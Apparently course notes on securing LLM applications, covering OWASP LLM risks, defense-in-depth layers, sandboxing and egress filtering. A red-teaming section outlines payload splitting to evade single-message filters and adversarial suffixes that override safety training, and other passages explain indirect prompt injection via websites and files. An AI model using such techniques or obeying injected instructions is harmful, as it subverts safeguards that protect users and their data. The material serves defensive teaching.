# Week 24: Securing LLM Systems

Securing LLM systems means focusing on the "shell" you build around the model to protect the business and its data.

### OWASP Top 10 for LLMs (The "Big Three" Focus)
- LLM01: Prompt Injection: * Direct: The "Jailbreak" (User tricks the bot).
    - Indirect: The "Hidden Payload" (Malicious instructions hidden in a website or PDF the bot reads).
- LLM06: Excessive Agency: The danger of granting an LLM too much "autonomy." If a bot has the power to delete_user(), a prompt injection can lead to catastrophic data loss.
- LLM02: Sensitive Information Disclosure: The risk of the model "memorizing" and then revealing PII (emails, keys) from its training data or retrieved context.

###  Defense-in-Depth Strategy
- Layer 1: Identity & Access Management (IAM): The LLM should only have access to data the current user is authorized to see.
- Layer 2: Input Sanitization: Using regex, blocklists, and "Intent Classifiers" to stop injections before they reach the model.
- Layer 3: Output Validation: Using "Post-processors" to scan the LLM's response for secrets or forbidden code before the user sees it.

### Red Teaming & Adversarial Testing
- Black-Box Testing: Testing the system without knowing its system prompt or architecture (simulating an outside hacker).
- Payload Splitting: Breaking a malicious command into 10 separate, innocent-looking chat messages to bypass a single-message filter.
- Adversarial Suffixes: Discovering specific "gibberish" strings that, when added to a prompt, statistically force the LLM to ignore its safety training.

---

### Deterministic Layer
- The "Sandboxed" Execution: The theory that any code the LLM generates must be treated as malicious by default and executed in an environment with no network access and limited CPU/RAM.
- Indirect Prompt Injection: The "silent killer" of RAGâ€”where a model visits a website or reads a file that contains hidden instructions meant to hijack the session.
- The Trust Boundary: Defining exactly where your application stops and the "untrusted" LLM begins.
- Egress Filtering: Not just watching what comes in (Input), but strictly controlling what goes out (Output) to prevent data exfiltration.
